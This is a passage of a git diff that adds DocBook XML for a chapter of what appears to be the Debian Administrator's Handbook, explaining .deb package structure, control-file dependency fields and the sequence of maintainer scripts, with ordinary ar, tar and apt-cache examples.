+				A first <command>apt upgrade</command> (a command used to automatically update installed programs) is generally required, especially for possible security updates issued since the release of the latest Debian stable version. These updates may involve some additional questions through <command>debconf</command>, the standard Debian configuration tool. For further information on these updates conducted by <command>apt</command>, please refer to <xref linkend="sect.apt-upgrade" />.
+			</para>
+
+		</section>
+
+	</section>
+</chapter>
+
diff --git a/tmp/cs-CZ/xml/05_packaging-system.xml b/tmp/cs-CZ/xml/05_packaging-system.xml
new file mode 100644
index 000000000..96b5c3066
--- /dev/null
+++ b/tmp/cs-CZ/xml/05_packaging-system.xml
@@ -0,0 +1,1302 @@
+<?xml version='1.0' encoding='utf-8' ?>
+<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.5//EN" "http://www.oasis-open.org/docbook/xml/4.5/docbookx.dtd" [
+]>
+<chapter id="packaging-system" lang="cs-CZ">
+	<chapterinfo>
+		 <keywordset>
+			<keyword>Binary package</keyword>
+			 <keyword>Source package</keyword>
+			 <keyword>dpkg</keyword>
+			 <keyword>dependencies</keyword>
+			 <keyword>conflict</keyword>
+
+		</keywordset>
+
+	</chapterinfo>
+	 <title>Packaging System: Tools and Fundamental Principles</title>
+	 <highlights> <para>
+		As a Debian system administrator, you will routinely handle <filename>.deb</filename> packages, since they contain consistent functional units (applications, documentation, etc.), whose installation and maintenance they facilitate. It is therefore a good idea to know what they are and how to use them.
+	</para>
+	 </highlights> <para>
+		This chapter describes the structure and contents of “binary” and “source” packages. The former are <filename>.deb</filename> files, directly usable by <command>dpkg</command>, while the latter contain the source code, as well as instructions for building binary packages.
+	</para>
+	 <section id="sect.binary-package-structure">
+		<title>Structure of a Binary Package</title>
+		 <indexterm>
+			<primary>package</primary>
+			<secondary>binary package</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary><command>ar</command></primary>
+		</indexterm>
+		 <para>
+			The Debian package format is designed so that its content may be extracted on any Unix system that has the classic commands <command>ar</command>, <command>tar</command>, and <command>xz</command> (sometimes <command>gzip</command> or <command>bzip2</command>). This seemingly trivial property is important for portability and disaster recovery.
+		</para>
+		 <para>
+			Imagine, for example, that you mistakenly deleted the <command>dpkg</command> program, and that you could thus no longer install Debian packages. <command>dpkg</command> being a Debian package itself, it would seem your system would be done for... Fortunately, you know the format of a package and can therefore download the <filename>.deb</filename> file of the <emphasis role="pkg">dpkg</emphasis> package and install it manually (see sidebar <xref linkend="sidebar.dpkg-apt-ar" />). If by some misfortune one or more of the programs <command>ar</command>, <command>tar</command> or <command>gzip</command>/<command>xz</command>/<command>bzip2</command> have disappeared, you will only need to copy the missing program from another system (since each of these operates in a completely autonomous manner, without dependencies, a simple copy will suffice). If your system suffered some even more outrageous fortune, and even these don't work (maybe the deepest system libraries are missing?), you should try the static version of <command>busybox</command> (provided in the <emphasis role="pkg">busybox-static</emphasis> package), which is even more self-contained, and provides subcommands such as <command>busybox ar</command>, <command>busybox tar</command> and <command>busybox xz</command>.
+		</para>
+		 <sidebar id="sidebar.dpkg-apt-ar"> <title><emphasis>TOOLS</emphasis> <command>dpkg</command>, <command>APT</command> and <command>ar</command></title>
+		 <indexterm>
+			<primary><command>dpkg</command></primary>
+		</indexterm>
+		 <indexterm>
+			<primary><command>ar</command></primary>
+		</indexterm>
+		 <indexterm>
+			<primary>APT</primary>
+		</indexterm>
+		 <para>
+			<command>dpkg</command> is the program that handles <filename>.deb</filename> files, notably extracting, analyzing, and unpacking them.
+		</para>
+		 <para>
+			<command>APT</command> is a group of programs that allows the execution of higher-level modifications to the system: installing or removing a package (while keeping dependencies satisfied), updating the system, listing the available packages, etc.
+		</para>
+		 <indexterm>
+			<primary><command>ar</command></primary>
+		</indexterm>
+		 <para>
+			As for the <command>ar</command> program, it allows handling files of the same name: <command>ar t <replaceable>archive</replaceable></command> displays the list of files contained in such an archive, <command>ar x <replaceable>archive</replaceable></command> extracts the files from the archive into the current working directory, <command>ar d <replaceable>archive</replaceable> <replaceable>file</replaceable></command> deletes a file from the archive, etc. Its man page (<citerefentry><refentrytitle>ar</refentrytitle>
+			<manvolnum>1</manvolnum></citerefentry>) documents all its other features. <command>ar</command> is a very rudimentary tool that a Unix administrator would only use on rare occasions, but admins routinely use <command>tar</command>, a more evolved archive and file management program. This is why it is easy to restore <command>dpkg</command> in the event of an erroneous deletion. You would only have to download the Debian package and extract the content from the <filename>data.tar.xz</filename> archive in the system's root (<filename>/</filename>):
+		</para>
+		 
+<screen>
+<computeroutput># </computeroutput><userinput>ar x dpkg_1.18.24_amd64.deb</userinput>
+<computeroutput># </computeroutput><userinput>tar -C / -p -xJf data.tar.xz</userinput></screen>
+		 </sidebar> <sidebar> <title><emphasis>BACK TO BASICS</emphasis> Man page notation</title>
+		 <para>
+			It can be confusing for beginners to find references to “<citerefentry><refentrytitle>ar</refentrytitle>
+			<manvolnum>1</manvolnum></citerefentry>” in the literature. This is generally a convenient means of referring to the man page entitled <literal>ar</literal> in section 1.
+		</para>
+		 <para>
+			Sometimes this notation is also used to remove ambiguities, for example to distinguish between the <command>printf</command> command that can also be indicated by <citerefentry><refentrytitle>printf</refentrytitle>
+			<manvolnum>1</manvolnum></citerefentry> and the <function>printf</function> function in the C programming language, which can also be referred to as <citerefentry><refentrytitle>printf</refentrytitle>
+			<manvolnum>3</manvolnum></citerefentry>.
+		</para>
+		 <para>
+			<xref linkend="solving-problems" /> discusses manual pages in further detail (see <xref linkend="sect.manual-pages" />).
+		</para>
+		 </sidebar> <para>
+			Have a look at the content of a <filename>.deb</filename> file:
+		</para>
+		 
+<screen><computeroutput>$ </computeroutput><userinput>ar t dpkg_1.18.24_amd64.deb</userinput>
+<computeroutput>debian-binary
+control.tar.gz
+data.tar.xz
+$ </computeroutput><userinput>ar x dpkg_1.18.24_amd64.deb</userinput>
+<computeroutput>$ </computeroutput><userinput>ls</userinput>
+<computeroutput>control.tar.gz  data.tar.xz  debian-binary  dpkg_1.18.24_amd64.deb
+$ </computeroutput><userinput>tar tJf data.tar.xz | head -n 15</userinput>
+<computeroutput>./
+./etc/
+./etc/alternatives/
+./etc/alternatives/README
+./etc/cron.daily/
+./etc/cron.daily/dpkg
+./etc/dpkg/
+./etc/dpkg/dpkg.cfg
+./etc/dpkg/dpkg.cfg.d/
+./etc/logrotate.d/
+./etc/logrotate.d/dpkg
+./sbin/
+./sbin/start-stop-daemon
+./usr/
+./usr/bin/
+$ </computeroutput><userinput>tar tzf control.tar.gz</userinput>
+<computeroutput>./
+./conffiles
+./postinst
+./md5sums
+./prerm
+./control
+./postrm
+$ </computeroutput><userinput>cat debian-binary</userinput>
+<computeroutput>2.0</computeroutput></screen>
+		 <para>
+			As you can see, the <command>ar</command> archive of a Debian package is comprised of three files:
+		</para>
+		 <itemizedlist>
+			<listitem>
+				<para>
+					<filename>debian-binary</filename>. This is a text file which simply indicates the version of the <filename>.deb</filename> file used (in 2017: version 2.0).
+				</para>
+
+			</listitem>
+			 <listitem>
+				<para>
+					<filename>control.tar.gz</filename>. This archive file contains all of the available meta-information, like the name and version of the package. Some of this meta-information allows package management tools to determine if it is possible to install or uninstall it, for example according to the list of packages already on the machine.
+				</para>
+
+			</listitem>
+			 <listitem>
+				<para>
+					<filename>data.tar.xz</filename>. This archive contains all of the files to be extracted from the package; this is where the executable files, documentation, etc., are all stored. Some packages may use other compression formats, in which case the file will be named differently (<filename>data.tar.bz2</filename> for bzip2, <filename>data.tar.gz</filename> for gzip).
+				</para>
+
+			</listitem>
+
+		</itemizedlist>
+
+	</section>
+	 <section id="sect.package-meta-information">
+		<title>Package Meta-Information</title>
+		 <indexterm>
+			<primary>package meta-information</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>package</primary>
+			<secondary>meta-information</secondary>
+		</indexterm>
+		 <para>
+			The Debian package is not only an archive of files intended for installation. It is part of a larger whole, and it describes its relationship with other Debian packages (dependencies, conflicts, suggestions). It also provides scripts that enable the execution of commands at different stages in the package's lifecycle (installation, removal, upgrades). These data are used by the package management tools but are not part of the packaged software; they are, within the package, what is called its “meta-information” (information about other information).
+		</para>
+		 <section id="sect.control">
+			<title>Description: the <filename>control</filename> File</title>
+			 <indexterm>
+				<primary>package meta-information</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>package</primary>
+				<secondary>meta-information</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary><filename>control</filename></primary>
+			</indexterm>
+			 <para>
+				This file uses a structure similar to email headers (as defined by RFC 2822). For example, for <emphasis role="pkg">apt</emphasis>, the <filename>control</filename> file looks like the following:
+			</para>
+			 
+<screen>
+<computeroutput>$ </computeroutput><userinput>apt-cache show apt</userinput>
+<computeroutput>Package: apt
+Version: 1.4.8
+Installed-Size: 3539
+Maintainer: APT Development Team &lt;deity@lists.debian.org&gt;
+Architecture: amd64
+Replaces: apt-utils (&lt;&lt; 1.3~exp2~)
+Depends: adduser, gpgv | gpgv2 | gpgv1, debian-archive-keyring, init-system-helpers (&gt;= 1.18~), libapt-pkg5.0 (&gt;= 1.3~rc2), libc6 (&gt;= 2.15), libgcc1 (&gt;= 1:3.0), libstdc++6 (&gt;= 5.2)
+Recommends: gnupg | gnupg2 | gnupg1
+Suggests: apt-doc, aptitude | synaptic | wajig, dpkg-dev (&gt;= 1.17.2), powermgmt-base, python-apt
+Breaks: apt-utils (&lt;&lt; 1.3~exp2~)
+Description-en: commandline package manager
+ This package provides commandline tools for searching and
+ managing as well as querying information about packages
+ as a low-level access to all features of the libapt-pkg library.
+ .
+ These include:
+  * apt-get for retrieval of packages and information about them
+    from authenticated sources and for installation, upgrade and
+    removal of packages together with their dependencies
+  * apt-cache for querying available information about installed
+    as well as installable packages
+  * apt-cdrom to use removable media as a source for packages
+  * apt-config as an interface to the configuration settings
+  * apt-key as an interface to manage authentication keys
+Description-md5: 9fb97a88cb7383934ef963352b53b4a7
+Tag: admin::package-management, devel::lang:ruby, hardware::storage,
+ hardware::storage:cd, implemented-in::c++, implemented-in::perl,
+ implemented-in::ruby, interface::commandline, network::client,
+ protocol::ftp, protocol::http, protocol::ipv6, role::program,
+ scope::application, scope::utility, sound::player, suite::debian,
+ use::downloading, use::organizing, use::searching, works-with::audio,
+ works-with::software:package, works-with::text
+Section: admin
+Priority: important
+Filename: pool/main/a/apt/apt_1.4.8_amd64.deb
+Size: 1231676
+MD5sum: 4963240f23156b2dda3affc9c0d416a3
+SHA256: bc319a3abaf98d76e7e13ac97ab0ee7c238a48e2d4ab85524be8b10cfd23d50d</computeroutput></screen>
+			 <sidebar> <title><emphasis>BACK TO BASICS</emphasis> RFC — Internet standards</title>
+			 <indexterm>
+				<primary>RFC</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Request For Comments</primary>
+			</indexterm>
+			 <para>
+				RFC is the abbreviation of “Request For Comments”. An RFC is generally a technical document that describes what will become an Internet standard. Before becoming standardized and frozen, these standards are submitted for public review (hence their name). The IETF (Internet Engineering Task Force) decides on the evolution of the status of these documents (proposed standard, draft standard, or standard).
+			</para>
+			 <para>
+				RFC 2026 defines the process for standardization of Internet protocols. <ulink type="block" url="http://www.faqs.org/rfcs/rfc2026.html" />
+			</para>
+			 </sidebar> <section>
+				<title>Dependencies: the <literal>Depends</literal> Field</title>
+				 <indexterm>
+					<primary>dependency</primary>
+				</indexterm>
+				 <indexterm>
+					<primary><literal>Depends</literal>, header field</primary>
+				</indexterm>
+				 <indexterm>
+					<primary>package</primary>
+					<secondary>dependency</secondary>
+				</indexterm>
+				 <para>
+					The dependencies are defined in the <literal>Depends</literal> field in the package header. This is a list of conditions to be met for the package to work correctly — this information is used by tools such as <command>apt</command> in order to install the required libraries, in appropriate versions fulfilling the dependencies of the package to be installed. For each dependency, it is possible to restrict the range of versions that meet that condition. In other words, it is possible to express the fact that we need the package <emphasis role="pkg">libc6</emphasis> in a version equal to or greater than “2.15” (written “<command>libc6 (&gt;= 2.15)</command>”). Version comparison operators are as follows:
+				</para>
+				 <itemizedlist>
+					<listitem>
+						<para>
+							<command>&lt;&lt;</command>: less than;
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							<command>&lt;=</command>: less than or equal to;
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							<command>=</command>: equal to (note that “<literal>2.6.1</literal>” is not equal to “<literal>2.6.1-1</literal>”);
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							<command>&gt;=</command>: greater than or equal to;
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							<command>&gt;&gt;</command>: greater than.
+						</para>
+
+					</listitem>
+
+				</itemizedlist>
+				 <para>
+					In a list of conditions to be met, the comma serves as a separator. It must be interpreted as a logical “and”. In conditions, the vertical bar (“|”) expresses a logical “or” (it is an inclusive “or”, not an exclusive “either/or”). Carrying greater priority than “and”, it can be used as many times as necessary. Thus, the dependency “(A or B) and C” is written <command>A | B, C</command>. In contrast, the expression “A or (B and C)” should be written as “(A or B) and (A or C)”, since the <literal>Depends</literal> field does not tolerate parentheses that change the order of priorities between the logical operators “or” and “and”. It would thus be written <command>A | B, A | C</command>. <ulink type="block" url="https://www.debian.org/doc/debian-policy/#document-ch-relationships" />
+				</para>
+				 <indexterm>
+					<primary>meta-package</primary>
+				</indexterm>
+				 <para>
+					The dependencies system is a good mechanism for guaranteeing the operation of a program, but it has another use with “meta-packages”. These are empty packages that only describe dependencies. They facilitate the installation of a consistent group of programs preselected by the meta-package maintainer; as such, <command>apt install <replaceable>meta-package</replaceable></command> will automatically install all of these programs using the meta-package's dependencies. The <emphasis role="pkg">gnome</emphasis>, <emphasis role="pkg">kde-full</emphasis> and <emphasis role="pkg">linux-image-amd64</emphasis> packages are examples of meta-packages.
+				</para>
+				 <sidebar> <title><emphasis>DEBIAN POLICY</emphasis> <literal>Pre-Depends</literal>, a more demanding <literal>Depends</literal> </title>
+				 <indexterm>
+					<primary><literal>Pre-Depends</literal>, header field</primary>
+				</indexterm>
+				 <indexterm>
+					<primary>pre-dependency</primary>
+				</indexterm>
+				 <para>
+					“Pre-dependencies”, which are listed in the “<literal>Pre-Depends</literal>” field in the package headers, complete the normal dependencies; their syntax is identical. A normal dependency indicates that the package in question must be unpacked and configured before configuration of the package declaring the dependency. A pre-dependency stipulates that the package in question must be unpacked and configured before execution of the pre-installation script of the package declaring the pre-dependency, that is before its installation.
+				</para>
+				 <para>
+					A pre-dependency is very demanding for <command>apt</command>, because it adds a strict constraint on the ordering of the packages to install. As such, pre-dependencies are discouraged unless absolutely necessary. It is even recommended to consult other developers on <email>debian-devel@lists.debian.org</email> before adding a pre-dependency. It is generally possible to find another solution as a work-around.
+				</para>
+				 </sidebar> <sidebar> <title><emphasis>DEBIAN POLICY</emphasis> <literal>Recommends</literal>, <literal>Suggests</literal>, and <literal>Enhances</literal> fields</title>
+				 <indexterm>
+					<primary><literal>Recommends</literal>, header field</primary>
+				</indexterm>
+				 <indexterm>
+					<primary><literal>Suggests</literal>, header field</primary>
+				</indexterm>
+				 <para>
+					The <literal>Recommends</literal> and <literal>Suggests</literal> fields describe dependencies that are not compulsory. The “recommended” dependencies, the most important, considerably improve the functionality offered by the package but are not indispensable to its operation. The “suggested” dependencies, of secondary importance, indicate that certain packages may complement and increase their respective utility, but it is perfectly reasonable to install one without the others.
+				</para>
+				 <para>
+					You should always install the “recommended” packages, unless you know exactly why you do not need them. Conversely, it is not necessary to install “suggested” packages unless you know why you need them.
+				</para>
+				 <indexterm>
+					<primary><literal>Enhances</literal>, header field</primary>
+				</indexterm>
+				 <para>
+					The <literal>Enhances</literal> field also describes a suggestion, but in a different context. It is indeed located in the suggested package, and not in the package that benefits from the suggestion. Its interest lies in that it is possible to add a suggestion without having to modify the package that is concerned. Thus, all add-ons, plug-ins, and other extensions of a program can then appear in the list of suggestions related to the software. Although it has existed for several years, this last field is still largely ignored by programs such as <command>apt</command> or <command>synaptic</command>. Its purpose is for a suggestion made by the <literal>Enhances</literal> field to appear to the user in addition to the traditional suggestions — found in the <literal>Suggests</literal> field.
+				</para>
+				 </sidebar>
+			</section>
+			 <section>
+				<title>Conflicts: the <literal>Conflicts</literal> field</title>
+				 <indexterm>
+					<primary>conflicts</primary>
+				</indexterm>
+				 <indexterm>
+					<primary><literal>Conflicts</literal>, header field</primary>
+				</indexterm>
+				 <indexterm>
+					<primary>package</primary>
+					<secondary>conflict</secondary>
+				</indexterm>
+				 <para>
+					The <literal>Conflicts</literal> field indicates when a package cannot be installed simultaneously with another. The most common reasons for this are that both packages include a file of the same name, or provide the same service on the same TCP port, or would hinder each other's operation.
+				</para>
+				 <para>
+					<command>dpkg</command> will refuse to install a package if it triggers a conflict with an already installed package, except if the new package specifies that it will “replace” the installed package, in which case <command>dpkg</command> will choose to replace the old package with the new one. <command>apt</command> always follows your instructions: if you choose to install a new package, it will automatically offer to uninstall the package that poses a problem.
+				</para>
+
+			</section>
+			 <section>
+				<title>Incompatibilities: the <literal>Breaks</literal> Field</title>
+				 <indexterm>
+					<primary>incompatibilities</primary>
+				</indexterm>
+				 <indexterm>
+					<primary><literal>Breaks</literal>, header field</primary>
+				</indexterm>
+				 <indexterm>
+					<primary>package</primary>
+					<secondary>incompatibility</secondary>
+				</indexterm>
+				 <para>
+					The <literal>Breaks</literal> field has an effect similar to that of the <literal>Conflicts</literal> field, but with a special meaning. It signals that the installation of a package will “break” another package (or particular versions of it). In general, this incompatibility between two packages is transitory, and the <literal>Breaks</literal> relationship specifically refers to the incompatible versions.
+				</para>
+				 <para>
+					<command>dpkg</command> will refuse to install a package that breaks an already installed package, and <command>apt</command> will try to resolve the problem by updating the package that would be broken to a newer version (which is assumed to be fixed and, thus, compatible again).
+				</para>
+				 <para>
+					This type of situation may occur in the case of updates without backwards compatibility: this is the case if the new version no longer functions with the older version, and causes a malfunction in another program without making special provisions. The <literal>Breaks</literal> field prevents the user from running into these problems.
+				</para>
+
+			</section>
+			 <section>
+				<title>Provided Items: the <literal>Provides</literal> Field</title>
+				 <indexterm>
+					<primary><literal>Provides</literal>, header field</primary>
+				</indexterm>
+				 <para>
+					This field introduces the very interesting concept of a “virtual package”. It has many roles, but two are of particular importance. The first role consists in using a virtual package to associate a generic service with it (the package “provides” the service). The second indicates that a package completely replaces another, and that for this purpose it can also satisfy the dependencies that the other would satisfy. It is thus possible to create a substitution package without having to use the same package name.
+				</para>
+				 <sidebar> <title><emphasis>VOCABULARY</emphasis> Meta-package and virtual package</title>
+				 <indexterm>
+					<primary>meta-package</primary>
+				</indexterm>
+				 <indexterm>
+					<primary>package</primary>
+					<secondary>virtual package</secondary>
+				</indexterm>
+				 <indexterm>
+					<primary>virtual package</primary>
+				</indexterm>
+				 <para>
+					It is essential to clearly distinguish meta-packages from virtual packages. The former are real packages (including real <filename>.deb</filename> files), whose only purpose is to express dependencies.
+				</para>
+				 <para>
+					Virtual packages, however, do not exist physically; they are only a means of identifying real packages based on common, logical criteria (service provided, compatibility with a standard program or a pre-existing package, etc.).
+				</para>
+				 </sidebar> <section>
+					<title>Providing a “Service”</title>
+					 <para>
+						Let us discuss the first case in greater detail with an example: all mail servers, such as <emphasis role="pkg">postfix</emphasis> or <emphasis role="pkg">sendmail</emphasis> are said to “provide” the <emphasis role="pkg">mail-transport-agent</emphasis> virtual package. Thus, any package that needs this service to be functional (e.g. a mailing list manager, such as <emphasis role="pkg">smartlist</emphasis> or <emphasis role="pkg">sympa</emphasis>) simply states in its dependencies that it requires a <emphasis role="pkg">mail-transport-agent</emphasis> instead of specifying a large yet incomplete list of possible solutions (e.g. <command>postfix | sendmail | exim4 | …</command>). Furthermore, it is useless to install two mail servers on the same machine, which is why each of these packages declares a conflict with the <emphasis role="pkg">mail-transport-agent</emphasis> virtual package. A conflict between a package and itself is ignored by the system, but this technique will prohibit the installation of two mail servers side by side.
+					</para>
+					 <sidebar> <title><emphasis>DEBIAN POLICY</emphasis> List of virtual packages</title>
+					 <indexterm>
+						<primary>package</primary>
+						<secondary>virtual package</secondary>
+					</indexterm>
+					 <para>
+						For virtual packages to be useful, everyone must agree on their name. This is why they are standardized in the Debian Policy. The list includes among others <emphasis role="pkg">mail-transport-agent</emphasis> for mail servers, <emphasis role="pkg">c-compiler</emphasis> for C programming language compilers, <emphasis role="pkg">www-browser</emphasis> for web browsers, <emphasis role="pkg">httpd</emphasis> for web servers, <emphasis role="pkg">ftp-server</emphasis> for FTP servers, <emphasis role="pkg">x-terminal-emulator</emphasis> for terminal emulators in graphical mode (<command>xterm</command>), and <emphasis role="pkg">x-window-manager</emphasis> for window managers.
+					</para>
+					 <para>
+						The full list can be found on the Web. <ulink type="block" url="http://www.debian.org/doc/packaging-manuals/virtual-package-names-list.txt" />
+					</para>
+					 </sidebar>
+				</section>
+				 <section>
+					<title>Interchangeability with Another Package</title>
+					 <para>
+						The <literal>Provides</literal> field is also interesting when the content of a package is included in a larger package. For example, the <emphasis role="pkg">libdigest-md5-perl</emphasis> Perl module was an optional module in Perl 5.6, and has been integrated as standard in Perl 5.8 (and later versions, such as 5.24 present in <emphasis role="distribution">Stretch</emphasis>). As such, the package <emphasis role="pkg">perl</emphasis> has since version 5.8 declared <literal>Provides: libdigest-md5-perl</literal> so that the dependencies on this package are met if the user has Perl 5.8 (or newer). The <emphasis role="pkg">libdigest-md5-perl</emphasis> package itself has eventually been deleted, since it no longer had any purpose when old Perl versions were removed.
+					</para>
+					 <figure>
+						<title>Use of a <literal>Provides</literal> field in order to not break dependencies</title>
+						 <mediaobject>
+							<imageobject>
+								<imagedata fileref="images/virtual-package.png" format="PNG" width="50%" />
+							</imageobject>
+
+						</mediaobject>
+
+					</figure>
+					 <para>
+						This feature is very useful, since it is never possible to anticipate the vagaries of development, and it is necessary to be able to adjust to renaming, and other automatic replacement, of obsolete software.
+					</para>
+					 <sidebar> <title><emphasis>BACK TO BASICS</emphasis> Perl, a programming language</title>
+					 <indexterm>
+						<primary>Perl</primary>
+					</indexterm>
+					 <indexterm>
+						<primary>CPAN</primary>
+					</indexterm>
+					 <para>
+						Perl (Practical Extraction and Report Language) is a very popular programming language. It has many ready-to-use modules that cover a vast spectrum of applications, and that are distributed by the CPAN (Comprehensive Perl Archive Network) servers, an exhaustive network of Perl packages. <ulink type="block" url="http://www.perl.org/" /> <ulink type="block" url="http://www.cpan.org/" />
+					</para>
+					 <para>
+						Since it is an interpreted language, a program written in Perl does not require compilation prior to execution. This is why they are called “Perl scripts”.
+					</para>
+					 </sidebar>
+				</section>
+				 <section>
+					<title>Past Limitations</title>
+					 <para>
+						Virtual packages used to suffer from some limitations, the most significant of which was the absence of a version number. To return to the previous example, a dependency such as <literal>Depends: libdigest-md5-perl (&gt;= 1.6)</literal>, despite the presence of Perl 5.10, would never be considered as satisfied by the packaging system — while in fact it most likely is satisfied. Unaware of this, the package system chose the least risky option, assuming that the versions do not match.
+					</para>
+					 <para>
+						This limitation has been lifted in <emphasis role="pkg">dpkg</emphasis> 1.17.11, and is no longer relevant in Stretch. Packages can assign a version to the virtual packages they provide with a dependency such as <literal>Provides: libdigest-md5-perl (= 1.8)</literal>.
+					</para>
+
+				</section>
+
+			</section>
+			 <section>
+				<title>Replacing Files: The <literal>Replaces</literal> Field</title>
+				 <indexterm>
+					<primary>replacement</primary>
+				</indexterm>
+				 <indexterm>
+					<primary><literal>Replaces</literal>, header field</primary>
+				</indexterm>
+				 <indexterm>
+					<primary>package</primary>
+					<secondary>replacement</secondary>
+				</indexterm>
+				 <para>
+					The <literal>Replaces</literal> field indicates that the package contains files that are also present in another package, but that the package is legitimately entitled to replace them. Without this specification, <command>dpkg</command> fails, stating that it can not overwrite the files of another package (technically, it is possible to force it to do so with the <literal>--force-overwrite</literal> option, but that is not considered standard operation). This allows identification of potential problems and requires the maintainer to study the matter prior to choosing whether to add such a field.
+				</para>
+				 <para>
+					The use of this field is justified when package names change or when a package is included in another. This also happens when the maintainer decides to distribute files differently among various binary packages produced from the same source package: a replaced file no longer belongs to the old package, but only to the new one.
+				</para>
+				 <para>
+					If all of the files in an installed package have been replaced, the package is considered to be removed. Finally, this field also encourages <command>dpkg</command> to remove the replaced package where there is a conflict.
+				</para>
+				 <sidebar id="sidebar.debtags"> <title><emphasis>GOING FURTHER</emphasis> The <literal>Tag</literal> field</title>
+				 <para>
+					In the <emphasis role="pkg">apt</emphasis> example above, we can see the presence of a field that we have not yet described, the <literal>Tag</literal> field. This field does not describe a relationship between packages, but is simply a way of categorizing a package in a thematic taxonomy. This classification of packages according to several criteria (type of interface, programming language, domain of application, etc.) has been available for a long time. Despite this, not all packages have accurate tags and it is not yet integrated in all Debian tools; <command>aptitude</command> displays these tags, and allows them to be used as search criteria. For those who are repelled by <command>aptitude</command>'s search criteria, the following website allows navigation of the tag database: <ulink type="block" url="https://wiki.debian.org/Debtags" />
+				</para>
+				 </sidebar>
+			</section>
+
+		</section>
+		 <section id="sect.configuration-scripts">
+			<title>Configuration Scripts</title>
+			 <indexterm>
+				<primary><filename>postinst</filename></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><filename>preinst</filename></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><filename>postrm</filename></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><filename>prerm</filename></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><filename>control.tar.gz</filename></primary>
+			</indexterm>
+			 <para>
+				In addition to the <filename>control</filename> file, the <filename>control.tar.gz</filename> archive for each Debian package may contain a number of scripts, called by <command>dpkg</command> at different stages in the processing of a package. The Debian Policy describes the possible cases in detail, specifying the scripts called and the arguments that they receive. These sequences may be complicated, since if one of the scripts fails, <command>dpkg</command> will try to return to a satisfactory state by canceling the installation or removal in progress (insofar as it is possible).
+			</para>
+			 <sidebar> <title><emphasis>GOING FURTHER</emphasis> <command>dpkg</command>'s database</title>
+			 <indexterm>
+				<primary><filename>/var/lib/dpkg/</filename></primary>
+			</indexterm>
+			 <indexterm>
+				<primary>dpkg</primary>
+				<secondary>database</secondary>
+			</indexterm>
+			 <para>
+				All of the configuration scripts for installed packages are stored in the <filename>/var/lib/dpkg/info/</filename> directory, in the form of a file prefixed with the package's name. This directory also includes a file with the <filename>.list</filename> extension for each package, containing the list of files that belong to that package.
+			</para>
+			 <para>
+				The <filename>/var/lib/dpkg/status</filename> file contains a series of data blocks (in the format of the famous mail headers, RFC 2822) describing the status of each package. The information from the <filename>control</filename> file of the installed packages is also replicated there.
+			</para>
+			 </sidebar> <para>
+				In general, the <filename>preinst</filename> script is executed prior to installation of the package, while the <filename>postinst</filename> follows it. Likewise, <filename>prerm</filename> is invoked before removal of a package and <filename>postrm</filename> afterwards. An update of a package is equivalent to removal of the previous version and installation of the new one. It is not possible to describe in detail all the possible scenarios here, but we will discuss the most common two: an installation/update and a removal.
+			</para>
+			 <sidebar> <title><emphasis>CAUTION</emphasis> Symbolic names of the scripts</title>
+			 <para>
+				The sequences described in this section call configuration scripts by specific names, such as <command>old-prerm</command> or <command>new-postinst</command>. They are, respectively, the <command>prerm</command> script contained in the old version of the package (installed before the update) and the <command>postinst</command> script contained in the new version (installed by the update).
+			</para>
+			 </sidebar> <sidebar> <title><emphasis>TIP</emphasis> State diagrams</title>
+			 <para>
+				Manoj Srivastava made these diagrams explaining how the configuration scripts are called by <command>dpkg</command>. Similar diagrams have also been developed by the Debian Women project; they are a bit simpler to understand, but less complete. <ulink type="block" url="https://people.debian.org/~srivasta/MaintainerScripts.html" /> <ulink type="block" url="https://www.debian.org/doc/debian-policy/#maintainer-script-flowcharts" />
+			</para>
+			 </sidebar> <section>
+				<title>Installation and Upgrade</title>
+				 <indexterm>
+					<primary><command>dpkg</command></primary>
+					<secondary>internal operation</secondary>
+				</indexterm>
+				 <para>
+					Here is what happens during an installation (or an update):
+				</para>
+				 <orderedlist>
+					<listitem>
+						<para>
+							For an update, <command>dpkg</command> calls the <command>old-prerm upgrade <replaceable>new-version</replaceable></command>.
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							Still for an update, <command>dpkg</command> then executes <command>new-preinst upgrade <replaceable>old-version</replaceable></command>; for a first installation, it executes <command>new-preinst install</command>. It may add the old version in the last parameter, if the package has already been installed and removed since (but not purged, the configuration files having been retained).
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							The new package files are then unpacked. If a file already exists, it is replaced, but a backup copy is temporarily made.
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							For an update, <command>dpkg</command> executes <command>old-postrm upgrade <replaceable>new-version</replaceable></command>.
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							<command>dpkg</command> updates all of the internal data (file list, configuration scripts, etc.) and removes the backups of the replaced files. This is the point of no return: <command>dpkg</command> no longer has access to all of the elements necessary to return to the previous state.
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							<command>dpkg</command> will update the configuration files, asking the user to decide if it is unable to automatically manage this task. The details of this procedure are discussed in <xref linkend="sect.conffiles" />.
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							Finally, <command>dpkg</command> configures the package by executing <command>new-postinst configure <replaceable>last-version-configured</replaceable></command>.
+						</para>
+
+					</listitem>
+
+				</orderedlist>
+
+			</section>
+			 <section>
+				<title>Package Removal</title>
+				 <para>
+					Here is what happens during a package removal:
+				</para>
+				 <orderedlist>
+					<listitem>
+						<para>
+							<command>dpkg</command> calls <command>prerm remove</command>.
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							<command>dpkg</command> removes all of the package's files, with the exception of the configuration files and configuration scripts.
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							<command>dpkg</command> executes <command>postrm remove</command>. All of the configuration scripts, except <filename>postrm</filename>, are removed. If the user has not used the “purge” option, the process stops here.
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
